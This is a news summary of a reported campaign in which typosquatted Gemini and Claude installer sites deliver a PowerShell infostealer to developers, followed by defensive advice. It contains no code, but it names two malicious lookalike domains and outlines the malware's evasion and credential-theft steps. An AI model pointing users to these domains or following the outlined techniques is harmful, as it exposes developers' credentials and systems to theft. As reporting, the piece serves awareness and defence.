Trojanized Gemini and Claude Installers Target Developers Via SEO Poisoning
Cybersecurity

Trojanized Gemini and Claude Installers Target Developers Via SEO Poisoning

HackRead
HackReadMay 26, 2026

Companies Mentioned

Anthropic

Anthropic

Google

Google

GOOG

Microsoft

Microsoft

MSFT

Brave Software

Brave Software

Proton

Proton

Zoom Video Communications

Zoom Video Communications

Telegram

Telegram

Notion

Notion

Zoho

Zoho

Discord

Discord

npm

npm

Slack

Slack

WORK

MEGA

MEGA

Why It Matters

The attack compromises development environments, giving threat actors access to corporate credentials and infrastructure, and underscores the growing supply‑chain risk of AI‑tool adoption.

Key Takeaways

  • Fake Gemini/Claude sites rank top via SEO poisoning
  • Malware installs real CLI while stealing credentials in memory
  • Targets browsers, collaboration apps, VPN configs, crypto wallets
  • Uses stolen EV certificate to bypass Windows warnings
  • Over 30 typosquatted domains lure developers to malicious installers

Pulse Analysis

Search engine optimization (SEO) poisoning has become a potent vector for delivering malware to technically savvy audiences. By registering domains that closely resemble legitimate AI‑tool URLs—such as geminicli.co.com and claudecode.co.com—attackers manipulate Google’s ranking algorithms to appear at the top of search results. Developers, eager to experiment with cutting‑edge models, often copy‑paste the advertised PowerShell command without verifying the source, inadvertently triggering a download from a malicious server. This tactic demonstrates how trust in search results can be weaponized, especially when the fake pages replicate official documentation verbatim.

The payload itself is a file‑less, memory‑resident infostealer written in PowerShell. It first disables Windows defenses like AMSI and ETW, then harvests a broad spectrum of data: browser credentials, session cookies from Slack, Teams, Zoom, and other collaboration tools, VPN configuration files, and private keys from crypto wallets such as Brave and Spectre. By installing the genuine Gemini CLI in the background, the malware masks its activity while maintaining persistence. The stolen information is encrypted and exfiltrated to multiple C2 domains, enabling attackers to pivot from passive data theft to active remote‑code execution within compromised corporate networks.

For developers and security teams, the incident highlights the necessity of strict download hygiene and supply‑chain verification. Always obtain tools directly from vendor‑owned domains, employ hash verification, and scan binaries with services like VirusTotal before execution. Organizations should also enforce endpoint protection that monitors PowerShell behavior and blocks unsigned scripts, even when they appear to originate from trusted installers. As AI utilities proliferate, the attack surface expands, making proactive credential management and zero‑trust network policies essential to mitigate the risk of similar SEO‑driven campaigns.

Trojanized Gemini and Claude Installers Target Developers Via SEO Poisoning

Read Original Article

Comments

Want to join the conversation?

Loading comments...